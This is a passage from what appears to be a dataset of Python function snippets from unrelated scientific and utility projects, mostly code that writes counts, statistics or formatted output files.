'\\n'.join(['\\t'.join(map(str, t)) for t in otu_dc_out])\r\n output.write(''.join([\"# Just OTU degree counts\\n\",\r\n \"Degree\tOTU Count\\n\", otu_dc_str]))\r\n output.close()\r\n\r\n output = open(os.path.join(dir_path,\r\n \"stats/real_dc_sample_otu_degree.txt\"), 'w')\r\n dc_out = sorted(degree_counts.items())\r\n dc_str = '\\n'.join(['\\t'.join(map(str, t)) for t in dc_out])\r\n output.write(''.join([\"# Sample and OTU degree counts\\n\",\r\n \"Degree\tBoth Count \\n\", dc_str]))\r\n output.close()\r\n\r\n num_pairs = len(cat_by_sample) * (len(cat_by_sample) - 1) / 2\r\n\r\n num_pairs_line = \"NUM PAIRS: %s\" % str(num_pairs)\r\n num_cat_pairs_line = \"NUM SAME CAT PAIRS: %s\"\r\n num_con_pairs_line = \"NUM CONNECTED PAIRS: %s\" % int(num_con)\r\n\r\n for cat, num in num_con_cat.items():\r\n filename = \"stats/real_cat_stats_%s.txt\" % cat\r\n output = open(os.path.join(dir_path, filename), 'w')\r\n num_neither = int((num_pairs - num_con) - (num_cat[cat] - num))\r\n stats_line = ''.join(['(', str(int(num)), ', ', str(int(num_con - num)),\r\n ', ', str(int(num_cat[cat] - num)), ', ',\r\n str(num_neither), ')'])\r\n G_stat = G_2_by_2(int(num), int(num_con - num),\r\n int(num_cat[cat] - num), num_neither)\r\n output.write(\r\n '\\n'.join([num_pairs_line,\r\n num_cat_pairs_line % num_cat[\r\n cat],\r\n num_con_pairs_line,\r\n stats_line,\r\n str(G_stat)]))\r\n output.close()", "def finalize(param, input_files='count_files'):\n\n import csv\n HELPER.writeLog('Collecting featureCount raw counts ... 
\\n', param)\n\n #check which of these files are actually available\n working_files = [iFile for iFile in param[input_files] if iFile != '']\n\n if len(working_files) > 0:\n #get feature ID using the first column in the first file in the list of working files\n csv_file = open(working_files[0])\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n\n #For featureCount output, we want to skip the first two lines as they\n #include the featureCount call and the headers which we don't want\n next(csv_reader, None)\n next(csv_reader, None)\n\n #Now start by taking the list of identifier,\n #which is the first column in the file\n counts = [row[0] for row in csv_reader]\n csv_file.close()\n\n #get all the expression values\n header = 'ID'\n for idx in range(param['num_samples']):\n if param[input_files] != '':\n header = header+'\\t'+param['stub'][idx]\n csv_file = open(param[input_files][idx])\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n\n #Here too we want to skip the first two lines, before getting the counts\n next(csv_reader, None)\n next(csv_reader, None)\n #Now start getting the counts (row[6]) and add in the ID (counts[i]) before it\n idx = 0\n for row in csv_reader:\n counts[idx] = counts[idx]+'\\t'+row[6]\n idx += 1\n csv_file.close()\n\n #output the file\n out_file = param['working_dir']+'deliverables/featureCount_raw_counts.txt'\n out_handle = open(out_file, 'w')\n out_handle.write(header+'\\n')\n\n for i in range(len(counts)):\n out_handle.write(counts[i]+'\\n')\n out_handle.close()\n\n #output_phenotype_file\n HELPER.writeLog('Writing phenotype data ... \\n', param)\n MODULE_HELPER.output_sample_info(param)\n\n #write summary stats\n #featureCount does this on its own so we can just fetch each summary file\n #check which of these files are actually available\n working_files = [iFile+'.summary' for iFile in param[input_files] if iFile != '']\n\n if len(working_files) > 0:\n #get Status column from summary file using the first column in\n #the first file in the list of working files\n csv_file = open(working_files[0])\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n #Here, we want to skip the first line, as it simply points to the\n #alignment file used when running featureCount\n next(csv_reader, None)\n\n #Now start by taking the list of identifier,\n #which is the first column in the file\n entry = [row[0] for row in csv_reader]\n csv_file.close()\n\n #get all the summary stats for each sample\n header = 'Status'\n\n for idx in range(param['num_samples']):\n if param[input_files] != '':\n header = header+'\\t'+param['stub'][idx]\n #Fetch the corresponding sample's summary file\n csv_file = open(param[input_files][idx]+'.summary')\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n #Again, we want to skip the first line, as it simply points\n #to the alignment file used when running featureCount\n next(csv_reader, None)\n\n #Now start getting the stats (row[1]) and add in the Status\n # (counts[i]) before it\n i = 0\n for row in csv_reader:\n entry[i] = entry[i]+'\\t'+row[1]\n i += 1\n csv_file.close()\n #output the file\n out_handle = open(param['working_dir']+\n 'results/featureCount/featureCount_stats.txt',\n 'w')\n out_handle.write(header+'\\n')\n\n for i in range(len(entry)):\n out_handle.write(entry[i]+'\\n')\n out_handle.close()\n else:\n print 'featureCount was not run successfully on any of the files..\\n'", "def WriteFileSize(self):\n # Simply a calculation of the number of clusters (e.g. 
sectors) * 512\n total_size = 0\n for cluster_range in self.cluster_ranges:\n clusters = cluster_range.split(\"-\")\n difference = int(clusters[1]) - int(clusters[0]) + 1\n self.cluster_list.extend(self.CreateList(int(clusters[0]), int(clusters[1])))\n print(f\"Cluster difference between {clusters[1]} and {clusters[0]} is {difference}\")\n total_size += difference*512\n print(f\"Total size has been calculated as {total_size}\")\n with open(self.output_file, \"r+b\") as fh:\n seeker = (self.root_directory_offset*self.sector_size)+((self.index_number-1)*self.directory_index_size)+(self.file_size_offset)\n #s_array = bytearray()\n print(f\"Reversing {total_size}\")\n ba_size = (total_size).to_bytes(4, byteorder='little')\n print(f\"Preparing to write {ba_size} to {seeker}\")\n fh.seek(seeker)\n fh.write(ba_size)\n print(\"File size written to root directory\")\n return True", "def generate_file(self, filename, amount):\n with open(filename, \"w\", encoding=\"utf-8\") as fi:\n count = 0\n space = \"\" if self.token is Tokenization.byte or self.token is Tokenization.character else \" \"\n for generate_token in self.generate():\n count += 1\n outputStr = str(generate_token)\n outputStr += space\n fi.write(outputStr)\n if count >= amount:\n break", "def summarize_series(fglob, outfile):\n with open(outfile, mode='w') as of:\n #Iterate over files\n flist = glob(fglob)\n flist = sorted(flist)\n lgrho = [] #list of log(rho) values, parallel to the list of rxnmap maps\n rxns = [] #list of maps of form 'rxn_name' --> energy release [erg/g/s]\n for f in flist:\n rxnmap = {}\n currxn = ''\n eps_nuc = ''\n for line in open(f,mode='r'):\n if not currxn and line.count('reaction name') == 1:\n i1 = line.index('<') + 1\n i2 = line.index('>')\n currxn = line[i1:i2]\n elif currxn and line.count('eps_nuc') == 1:\n eps_nuc = float(line.partition(':')[2].strip())\n rxnmap[currxn] = eps_nuc\n currxn = ''\n elif line.count('log rho') == 1:\n lgrho.append(line.partition('rho')[2].strip())\n srtmap = sorted(rxnmap.items(), key=operator.itemgetter(1), reverse=True) #sort on values\n rxns.append(srtmap)\n\n #Write header\n of.write('log(rho): ' + (' {:3.3s} |'*len(lgrho)).format(*lgrho) + '\\n')\n\n #Write rows of data for each logrho, include top ten rxns\n start = ' '\n for i in range(10):\n of.write(start)\n for tup in rxns:\n of.write('{:23s}'.format(tup[i][0]))\n of.write('\\n')\n of.write(start)\n for tup in rxns:\n of.write('{:<23.8e}'.format(tup[i][1]))\n of.write('\\n\\n')", "def countDataSize(self,filename):\n \n d = h5py.File(filename,'r')\n features = d['spectrometer/features'][:]\n select = self.selectData(features.astype(float), self.ifeature, d)\n N = len(features[select])\n d.close()\n\n N = (N//self.offsetLen) * self.offsetLen\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def generate(self, fileName):\n self.preProcess()\n styleFile = open(fileName, 'w')\n # write head part\n head = \"\"\"#!/usr/bin/env python\n\nimport os\n\nfrom WMQuality.Code import Code\n\n# output of the log files\n# prefix of the files in cvs\n# quality script for using pylint:\nqualityScript = '%s'\n# output file:\nqualityReport = '%s'\n# rating 
threshold (min: 0, max 10)\nthreshold = %s\n\npackages = {\\\\\n \"\"\" % (self.script, self.report, self.threshold)\n styleFile.writelines(head)\n styleFile.writelines('\\n')\n\n for moduleName in self.module.keys():\n # find the one with the most votes per module:\n # register this.\n styleFile.writelines(\" '\" + moduleName + \"':'\" + self.module[moduleName] + \"',\\\\\\n\")\n styleFile.writelines('}\\n')\n tail = \"\"\"\ncode = Code(qualityScript, qualityReport, WMCore.WMInit.getWMBASE(), threshold, packages)\ncode.run()\ncode.summaryText()\n \"\"\"\n styleFile.writelines(tail)\n styleFile.close()", "def main():\n input_file = sys.argv[1]\n target_width = int(sys.argv[2]) * 2\n\n to_write = \"\"\n \n print(\"Processing: %s\" % input_file)\n\n with open(input_file,\"r\") as fh:\n for line in fh.readlines():\n slices = line[:-1]\n \n endian_buf = []\n\n while(len(slices) > 0):\n k = slices[0:target_width]\n endian_buf.insert(0,k+\"\\n\")\n slices = slices[target_width:]\n\n for b in endian_buf:\n to_write += b\n\n with open(input_file,\"w\") as fh:\n fh.write(to_write)", "def create_con_ftst_file(con_file, model_name, fTest, outputModelFilesDirectory):\n\n evs = open(con_file, 'r').readline()\n evs = evs.rstrip('\\r\\n').split(',')\n count_ftests = 0\n\n for ev in evs:\n\n if 'f_test' in ev.lower():\n\n count_ftests += 1\n\n\n try:\n\n data = np.genfromtxt(con_file, names=True, delimiter=',', dtype=None)\n\n except:\n\n print \"Error: Could not successfully read in contrast file: \", con_file\n raise Exception\n\n\n lst = data.tolist()\n\n\n ftst = []\n contrasts = []\n contrast_names = []\n\n length = None\n length = len(list(lst[0]))\n\n\n try:\n\n for tp in lst:\n\n contrast_names.append(tp[0])\n contrasts.append(list(tp)[1:length-count_ftests])\n\n if fTest:\n ftst.append(list(tp[length-count_ftests: length]))\n\n contrasts = np.array(contrasts, dtype=np.float16)\n \n if fTest:\n fts_n = np.array(ftst)\n\n except:\n print \"\\n\\n\" + \"ERROR: Not enough contrasts for running f-tests.\" \\\n \"\\n Tip: Do you have only one contrast in your contrasts file?\" \\\n \" f-tests require more than one contrast.\" + \"\\n\" + \\\n \"Either turn off f-tests or include more contrasts.\" + \"\\n\" + \\\n \"Error name: create_fsl_model_0002\" + \"\\n\\n\"\n raise Exception\n\n\n try:\n\n f = open(os.path.join(outputModelFilesDirectory, model_name + '.con'), 'w')\n\n idx = 1\n pp_str = '/PPheights'\n re_str = '/RequiredEffect'\n for name in contrast_names:\n\n print >>f, '/ContrastName%d' %idx, '\\t', name\n pp_str += '\\t%1.5e' %(1)\n re_str += '\\t%1.5e' %(1)\n idx += 1\n\n print >>f, '/NumWaves\\t', (contrasts.shape)[1]\n print >>f, '/NumContrasts\\t', (contrasts.shape)[0]\n print >>f, pp_str\n print >>f, re_str + '\\n'\n print >>f, '/Matrix'\n \n np.savetxt(f, contrasts, fmt='%1.5e', delimiter='\\t')\n\n f.close()\n\n except:\n print \"Error: Could not create .con file.\"\n print \"\"\n raise Exception\n\n\n if fTest:\n\n try:\n\n fts_n = fts_n.T\n f = open(os.path.join(outputModelFilesDirectory, model_name + '.fts'), 'w')\n print >>f, '/NumWaves\\t%d' % (contrasts.shape)[0]\n print >>f, '/NumContrasts\\t%d\\n' % count_ftests\n\n print >>f, '/Matrix'\n\n for i in range(fts_n.shape[0]):\n print >>f, ' '.join(fts_n[i].astype('str'))\n #np.savetxt(f, fts_n[None], fmt='%d', delimiter=' ')\n f.close()\n\n except:\n print \"Error: Could not create .fts file.\"\n print \"\"\n raise Exception", "def write_out4fp(fname,specorder,nspcs,agr,nr,rmax,pairs,nperline=6):\n ndat = nr *len(pairs)\n data = 
np.zeros(ndat)\n n = 0\n for pair in pairs:\n isid,jsid = pair\n for i in range(nr):\n data[n] = agr[isid,jsid,i]\n n += 1\n\n with open(fname,'w') as f:\n f.write('# RDF for pairs: ')\n for pair in pairs:\n si = specorder[pair[0]-1]\n sj = specorder[pair[1]-1]\n f.write(' {0:s}-{1:s},'.format(si,sj))\n f.write('\\n')\n f.write('# rmax, nr = {0:.3f}, {1:d}\\n'.format(rmax,nr))\n f.write('#\\n')\n #...Num of data, weight for the data\n f.write(' {0:6d} {1:7.3f}\\n'.format(ndat, 1.0))\n j0 = 0\n while True:\n f.write(' '.join('{0:12.4e}'.format(data[j]) for j in range(j0,j0+nperline) if j < ndat))\n f.write('\\n')\n j0 += nperline\n if j0 >= ndat:\n break\n\n return None", "def Seperate(f_read, f_write_name):\n lines = f_read.readlines()\n line_s = [line.split() for line in lines]\n\n for i in range(6, 13):\n nbytes = pow(2,i)\n f_write = f_write_name + str(nbytes) + \"b.txt\"\n f = open(f_write, \"w+\")\n\n for line in line_s:\n if line[3] == str(nbytes):\n f.write(\" \".join(line))\n f.write(\"\\n\")\n f.close()", "def _write_example_count(count: int, output_file: str) -> Text:\n count_fname = output_file + '.num_examples.txt'\n with tf.gfile.GFile(count_fname, 'w') as count_writer:\n count_writer.write(str(count))\n return count_fname", "def spectrum_parser():\n from tools import file_importer, file_outporter\n from random import random\n # from math import log10\n \n print(\"this is spectrum parser\")\n \n relPath = \"bob/processed/OST-24-05-2017_combined.csv\"\n outPath = \"bob/processed/OST-24-05-2017_combined_no0_spectrum.csv\"\n inpF = file_importer(relPath)\n outF = file_outporter(outPath) \n headerFlag = True\n rowCount = 0\n for inpLine in inpF:\n if headerFlag: \n headerFlag = False\n spColCount = 0\n inpList = inpLine.split(\"\\t\")\n for headerI in inpList:\n if \"Peptides ST-1|Peptides ST-2|Peptides ST-3\" == headerI:\n break\n else: spColCount += 1\n outF.write(\"ID,Protein ID, Gene name,\") # write header into output file\n for headI in inpList[spColCount].split(\"|\"):\n outF.write(headI + \",\")\n for headI in inpList[spColCount + 1].split(\"|\")[:-1]:\n outF.write(headI + \",\")\n outF.write(inpList[spColCount + 1].split(\"|\")[-1] + \"\\n\")\n rowCount += 1\n continue\n \n outF.write(str(rowCount) + \",\")\n \n inpLine = inpLine.strip()\n inpItems = inpLine.split(\"\\t\")\n inpName = max(inpItems[0].split(\"|\"), key=len) # get unique protein ID\n inpGeneName = max(inpItems[6].split(\"|\"), key=len) # and gene name\n outF.write(inpName + \",\" + inpGeneName + \",\")\n \n inpSP = inpItems[spColCount].split(\"|\") + inpItems[spColCount + 1].split(\"|\") # get lfq intensity scores\n # print inpSP\n for lfqI in inpSP[:-1]: # write lfq values\n if lfqI == \"_\" or lfqI == \"0\":\n outF.write(str(random()) + \",\") ################## try with log10 values this time\n else:\n try:\n outF.write(str(lfqI) + \",\")\n except ValueError:\n print(inpItems)\n raise\n \n if inpSP[-1] == \"_\" or inpSP[-1] == \"0\": outF.write(str(random()) + \"\\n\")\n else: outF.write(inpSP[-1] + \"\\n\")\n \n \n \n rowCount += 1", "def divide_url_all():\n\tf = open(\"url_all.txt\", \"r+\")\n\turl_amount = 0\n\tfile_num = 1\n\tline = f.readline()\n\tsub_f = open(\"url_\"+str(file_num)+\".txt\", \"w+\")\n\twhile(line != \"\"):\n\t\t#print (\"line : \" + line )\n\t\turl_amount += 1\n\t\tsub_f.write(line)\n\t\tif url_amount > 33999:\n\t\t\tsub_f.close()\n\t\t\turl_amount = 0\n\t\t\tfile_num += 1\n\t\t\tsub_f = open(\"url_\"+str(file_num)+\".txt\", \"w+\")\n\t\tline = 
f.readline()\n\tsub_f.close()\n\treturn file_num", "def calcNumOfWrites(size, seedingFile, currentUnit):\n\tadjust = SeedFiles[seedingFile]\n\tif (currentUnit == 'gb'):\n\t\tsize = size * 1024 # convert to mb\n\tadjust = float(size) / float(adjust)\n\treturn int(math.ceil(adjust))", "def _summary(in_file):\n data = Counter()\n out_file = in_file + \"_size_stats\"\n if file_exists(out_file):\n return out_file\n with open(in_file) as in_handle:\n for line in in_handle:\n counts = int(line.strip().split(\"_x\")[1])\n line = in_handle.next()\n l = len(line.strip())\n in_handle.next()\n in_handle.next()\n data[l] += counts\n with file_transaction(out_file) as tx_out_file:\n with open(tx_out_file, 'w') as out_handle:\n for l, c in data.items():\n out_handle.write(\"%s %s\\n\" % (l, c))\n return out_file", "def test_large_file(self):\n\t\tfixedgenerator.GenerateFixedWidthFile().generate()\n\t\tmain.Main(['input/large.txt']).run()\n\t\tself.assertTrue(filecmp.cmp('output/output.csv', 'output/large.csv'))\n\t\tos.remove('input/large.txt')\n\t\tos.remove('output/large.csv')", "def make_subsample(whole_file, subsample_file):\n line_counter = 0\n with open(whole_file, 'r') as rf, open(subsample_file, 'w') as wf:\n for line_txt in rf:\n try:\n uid = json.loads(line_txt)['attributed_to']\n if uid[-1] == '0' and uid[-2] == '0': # 1/100\n wf.write(line_txt)\n except:\n print('Error parsing line_txt:', line_txt)\n line_counter += 1\n if line_counter % 10 ** 6 == 0:\n print('read %dM lines' % (line_counter // 10 ** 6))", "def create_file(destfile, size):\n fulllines = int(math.floor(size / 100.0))\n nwd = int(math.floor(math.log(fulllines+1))) + 1\n fmt = \"%{0}d \".format(nwd)\n\n with open(destfile, 'w') as fd:\n for i in range(fulllines):\n fd.write(fmt % i)\n fd.write('x' * (98-nwd))\n fd.write('\\n')\n\n left = size - (fulllines * 100)\n if left > nwd:\n fd.write(fmt % (fulllines))\n left -= nwd + 1\n if left > 1:\n fd.write('x' * (left-1))\n left = 1\n if left > 0:\n fd.write('\\n')\n\n return os.stat(destfile).st_size", "def get_library_sizes(args):\n with open(args.counts, \"r\") as counts:\n sizes = []\n head = True\n for line in counts:\n line = line.strip()\n if head:\n head = False\n samples = line.split(\"\\t\")[3:]\n total_counts = [0] * len(samples)\n else:\n counts = line.split(\"\\t\")\n if counts[1] == \"NA\":\n break\n else:\n counts = counts[3:]\n for i in range(len(counts)):\n total_counts[i] += int(counts[i])\n\n for i in range(len(samples)):\n sizes.append([samples[i], total_counts[i]])\n\n return sizes", "def main():\n\n file_name_base = \"./lab-record/result/fairness/\"\n scenarios = ['lan', 'wan1', 'wan2']\n scenario = scenarios[2]\n\n algorithms = [\"bbr\", \"scalable\", \"bic\", \"highspeed\", \"htcp\", \"hybla\",\n \"illinois\", \"vegas\", \"yeah\"]\n names = [\"BBR\", \"Scalable\", \"BIC\", \"High Speed\",\n \"H-TCP\", \"Hybla\", \"Illinois\", \"Vegas\", \"YeAH\"]\n\n test_types = [\"vs_reno\", \"vs_cubic\", \"vs_itself\"]\n\n fsize = 36\n \n index_reno = []\n index_cubic = []\n index_itself = []\n\n data = []\n \n print 'Loadint statistics for ' + file_name_base + '/' + scenario\n\n for algorithm in algorithms:\n for test in test_types:\n path_base = file_name_base + \"/\" + scenario + \"/\" + test + \"/\" + \\\n algorithm + \"/\"\n if test == \"vs_itself\":\n exp_name = names[algorithms.index(algorithm)] + \"_1\"\n con_name = names[algorithms.index(algorithm)] + \"_2\"\n print path_base + exp_name\n print path_base + con_name\n exp_filename = \"/\" + algorithm + \"_1.log\"\n 
con_filename = \"/\" + algorithm + \"_2.log\"\n process(path_base, exp_filename, con_filename, index_itself)\n if test == \"vs_reno\":\n exp_name = names[algorithms.index(algorithm)]\n con_name = \"Reno\"\n print path_base + exp_name\n print path_base + con_name\n exp_filename = \"/\" + algorithm + \".log\"\n con_filename = \"/reno.log\"\n process(path_base, exp_filename, con_filename, index_reno)\n if test == \"vs_cubic\":\n con_name = \"CUBIC\"\n exp_name = names[algorithms.index(algorithm)]\n print path_base + exp_name\n print path_base + con_name\n exp_filename = \"/\" + algorithm + \".log\"\n con_filename = \"/cubic.log\"\n process(path_base, exp_filename, con_filename, index_cubic)\n\n size = 9\n x = numpy.arange(size)\n\n total_width, n = 1.2, 2.5\n width = 1.0 / n\n x = x - (total_width - width) / 2\n\n for i in range(0, len(x)):\n x[i] += 0.5 * i\n\n # Exp\n fig = plt.figure()\n\n # Con\n con_reno = plt.bar(x + 0 * width - 1.2,\n index_reno,\n width=width,\n label='Against Reno',\n alpha=0.5,\n color=\"darkorange\")\n\n con_cubic = plt.bar(x + 1 * width - 1.2,\n index_cubic,\n width=width,\n label='Against CUBIC',\n alpha=0.5,\n color=\"lawngreen\")\n\n con_itself = plt.bar(x + 2 * width - 1.2,\n index_itself,\n width=width,\n label='Against Another Same CCA',\n alpha=0.5,\n color=\"dodgerblue\")\n\n # Index\n plt.xticks(x + 1.5 * width - 1.2, [\"BBR\", \"Scalable\", \"BIC\", \"High Speed\",\n \"H-TCP\", \"Hybla\", \"Illinois\", \"Vegas\",\n \"YeAH\"],\n fontsize=fsize,\n rotation=\"45\")\n plt.ylabel(\"Jain`s Fairness Index\", fontsize=fsize)\n plt.yticks(fontsize=fsize)\n plt.ylim(0.5, 1.1)\n\n ax = plt.subplot(111)\n ax.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\n ncol=3, mode=\"expand\", borderaxespad=0., fontsize=fsize)\n\n plt.subplots_adjust(left=0.07, right=0.98, top=0.9, bottom=0.2)\n\n plt.show()", "def write_file(self):\r\n # -open file for writing\r\n f_fbob = open(self.fn_path, 'w')\r\n\r\n # -write header\r\n f_fbob.write('%s\\n' % (self.heading))\r\n\r\n # -write sections 1 & 2 : NOTE- what about NOPRINT?\r\n f_fbob.write('%10i%10i%10i%10i\\n' % (self.nqfb, self.nqcfb,\r\n self.nqtfb, self.iufbobsv))\r\n f_fbob.write('%10e\\n' % (self.tomultfb)) # check format\r\n\r\n # -write sections 3-5 looping through observations groups\r\n c = 0\r\n for i in range(self.nqfb):\r\n # while (i < self.nqfb):\r\n # write section 3\r\n f_fbob.write('{:10d}{:10d}\\n'.format(self.nqobfb[i],\r\n self.nqclfb[i]))\r\n\r\n # Loop through observation times for the groups\r\n for j in range(self.nqobfb[i]):\r\n # -write section 4\r\n f_fbob.write(\r\n '{}{:10d}{:10.4g}{}{:10.4g}\\n'.format(self.obsnam[c],\r\n self.irefsp[c],\r\n self.toffset[c], ' ',\r\n self.flwobs[c]))\r\n c += 1 # index variable\r\n\r\n # -write section 5 - NOTE- need to adjust factor for muliple obs same cell\r\n for j in range(abs(self.nqclfb[i])):\r\n if self.nqclfb[\r\n i] < 0: # set factor to 1.0 for all cells in group\r\n self.factor[i, :] = 1.0\r\n f_fbob.write('{:10d}{:10d}{:10d}{}{:10f}\\n'\r\n .format(self.layer[i, j], (self.row[i, j]),\r\n self.column[i, j],\r\n ' ', self.factor[\r\n i, j])) # note- is 10f good enough here?\r\n\r\n f_fbob.close()\r\n #\r\n # swm: BEGIN hack for writing standard file\r\n sfname = self.fn_path # swm:hack\r\n sfname += '_ins' # swm: hack\r\n # write header\r\n f_ins = open(sfname, 'w') # swm: hack for standard file\r\n f_ins.write('jif @\\n') # swm: hack for standard file\r\n f_ins.write('StandardFile 0 1 %s\\n' % (\r\n self.nqtfb)) # swm: hack for standard file\r\n for i 
in range(0, self.nqtfb):\r\n f_ins.write(\r\n '{}\\n'.format(self.obsnam[i])) # swm: hack for standard file\r\n\r\n f_ins.close()\r\n # swm: END hack for writing standard file\r\n\r\n return", "def append_output(metadata, filename):\n size_pre = os.path.getsize(filename) / 1.0e+6\n metadata.to_csv(filename, header=False,\n mode='a', compression='gzip')\n size_post = os.path.getsize(filename) / 1.0e+6\n size_appended = size_post - size_pre\n\n print(\"Appended {:.2F} MB of metadata to {} ({:.2F} MB)\"\n .format(size_appended, filename, size_post))", "def init_datafile(output_settings, instrument):\r\n # find the current directory\r\n target_dir = '/'.join([output_settings['folder'], output_settings['cruise'], 'Data/Acrobat/RAW',instrument['name']])\r\n print_spacer()\r\n \r\n # make a new file\r\n print 'Creating new file....'\r\n # find the current time and write as string\r\n current_time = time.strftime(\"%Y-%m-%dT%H%MZ\", time.gmtime(time.time()))\r\n # give it a name\r\n filestr = current_time+'_'+output_settings['cruise']+instrument['name']+'RAW.dat' # concatenates strings using \r\n # print target_dir+'/'+filestr\r\n # now set the target \r\n targetstr = '/'.join([target_dir,filestr]) # concatencates strings using join\r\n print targetstr\r\n # open the text file\r\n fs = open(targetstr, 'w')\r\n return fs # return the file id\r", "def write_fenth_out4fp(fname,dH,vol):\n with open(fname,'w') as f:\n cmd = ' '.join(s for s in sys.argv)\n f.write('# Output at {0:s} from,\\n'.format(datetime.now().strftime('%Y-%m-%d %H:%M:%S')))\n f.write('# {0:s}\\n'.format(cmd))\n #...Num of data, weight for the data\n f.write(' {0:6d} {1:7.3f}\\n'.format(2, 1.0))\n f.write(' {0:8.3f} {1:8.3f}\\n'.format(dH,vol))\n return None", "def file_setup(self):\n #output a .edf file if the input is txt\n if self.args.input_format == 'txt':\n signals = []\n headers = []\n \n #read sample frequency from a .xml file\n if self.args.is_test:\n self.sample_rate = 1024\n else:\n xml_file = open(self.args.input_path + self.args.input_name + '.xml', \"r\")\n xml_content = xml_file.read()\n my_ordered_dict = xmltodict.parse(xml_content)\n dict = json.loads(json.dumps(my_ordered_dict))\n self.sample_rate = eval(dict['RECORD_INFO']['Record']['SamplesFreq'])\n \n #define header, needed for .edf file\n# header = {'label':'ch_name', \n# 'dimension': 'uV',\n# 'sample_rate': self.sample_rate,\n# 'physical_max': 5000,\n# \"physical_min\": -5000,\n# 'digital_max': 5000,\n# 'digital_min': -5000,\n# 'transducer': 'None',\n# 'prefilter': 'None'}\n\n# j = 0\n for i in self.files:\n if i[-3:] != 'xml' and i[-4:] != 'xysw':\n raw = np.loadtxt(self.args.input_path + i)\n self.physical_max.append(np.max(raw))\n self.physical_min.append(np.min(raw))\n \n \n signals.append(raw)\n# new_header = header.copy()\n# new_header['label'] = 'ch' + str(j)\n# new_header['physical_max'] = np.max(raw)\n# new_header['physical_min'] = np.min(raw)\n\n# j = j+1\n# headers.append(new_header)\n self.ch_num = self.ch_num+1\n \n #write edf\n with open(self.output_edf_original, 'w') as output:\n flag = pyedflib.highlevel.write_edf_quick(output.name, signals, self.sample_rate, digital=False)\n if flag == False:\n print('unable to save file into .edf')\n exit()\n else:\n print('txt data loaded into edf, edf saved at ./output_edf as: ' + self.output_edf_original)\n self.raw=mne.io.read_raw_edf(self.output_edf_original,preload=True)\n self.ch_names = self.raw.ch_names\n \n #if already a .edf\n elif self.args.input_format == 'bdf':\n self.raw = 
mne.io.read_raw_bdf(self.args.input_path + self.files[0], preload = True)\n self.ch_num = len(self.raw.ch_names)\n self.ch_names = self.raw.ch_names\n self.sample_rate = self.raw.info['sfreq']\n elif self.args.input_format == 'edf':\n self.raw = mne.io.read_raw_edf(self.args.input_path + self.files[0], preload = True)\n self.ch_num = len(self.raw.ch_names)\n self.ch_names = self.raw.ch_names\n self.sample_rate = self.raw.info['sfreq']\n elif self.args.input_format =='mne':\n mne_exp = mne.datasets.eegbci.load_data(1, 2, path=None, force_update=False, update_path=None, base_url='https://physionet.org/files/eegmmidb/1.0.0/', verbose=None)[0]\n self.raw = mne.io.read_raw_edf(mne_exp, preload = True)\n self.ch_num = len(self.raw.ch_names)\n self.ch_names = self.raw.ch_names\n self.sample_rate = self.raw.info['sfreq']\n \n \n return self.raw", "def write_to_file(qz_values, form_factors, errors, filename):\n with open(filename, 'w') as f:\n f.write(\"\"\"set direct_err 1\nset stepsize_integral 0.05\nset normal_mode 2\n\n\"\"\")\n f.write(\"\"\"# This sample was created by NFIT_to_SDP program.\n# (1) Change all ? to an appropriate sample number. \n# (2) Change sample_name to whatever sample name you want.\n# (3) Change other parameters to actual physical values.\n# (4) Copy the following lines to your smp file.\nsamplist ? sample_name\nparameter ? nobeam \\\\\n1.18 2.3 5 2 10 1 -64 65 0.0 \\\\\nx 0.333 67.0 91.0 0 7.875 0.0 9.0 0.0 \\\\\n\"\"\")\n for qz, F, sig in zip(qz_values, form_factors, errors):\n f.write(\"{0: 8.3f} {1: .4f} {2: 8.3f} \\\\\\n\".format(F, qz, sig))", "def writeStats(inDir, outFname):\n ofh = open(outFname, \"w\")\n ofh.write(\"meta\\tkallistoProcReads\\tkallistoAlnReads\\tkallistoEstFragLen\\n\")\n\n inFnames = glob.glob(join(inDir, \"log\", \"*.log\"))\n print(\"Parsing %d logfiles and writing to %s\" % (len(inFnames), outFname))\n for inFname in inFnames:\n cellId = basename(inFname).split(\".\")[0].split(\"_\")[0]\n # [quant] processed 1,836,518 reads, 636,766 reads pseudoaligned\n # [quant] estimated average fragment length: 251.99\n for line in open(inFname):\n if line.startswith(\"[quant] processed \"):\n words = line.split()\n readCount = words[2].replace(\",\",\"\")\n alignCount = words[4].replace(\",\",\"\")\n if line.startswith(\"[quant] estimated average fragment length:\"):\n fragLen = line.split()[5]\n row = [cellId, readCount, alignCount, fragLen]\n ofh.write(\"\\t\".join(row)+\"\\n\")\n ofh.close()", "def final_output_analysis(samples_dict, dir_results_path):\n with open(path.join(dir_results_path, 'corrupted_processes.txt'), 'w', encoding='utf-8', errors='replace') as c_out:\n with open(path.join(dir_results_path, 'analysis.txt'), 'w', encoding='utf-8', errors='replace') as i_out:\n with open(path.join(dir_results_path, 'syscalls.txt'), 'w', encoding='utf-8', errors='replace') as s_out:\n for uuid in sorted(samples_dict.keys()):\n reduced_sample = samples_dict[uuid]\n\n i_out.write('{} {}\\n'.format(string_utils.filename, uuid))\n s_out.write('{} {}\\n'.format(string_utils.filename, uuid))\n c_out.write('{} {}\\n'.format(string_utils.filename, uuid))\n\n # corrupted processes section\n process_repr = '\\t\\t{:15s}\\t{:10d}\\t{:15s}\\tby:\\t{:15s}\\t{:10d}\\n'\n for process in reduced_sample.corrupted_processes:\n c_out.write(process_repr.format(process[0],\n process[1],\n process[2],\n process[3],\n process[4]))\n\n # instruction count section\n i_out.write(string_utils.out_final + '\\t' + str(reduced_sample.total_instruction) + '\\n')\n 
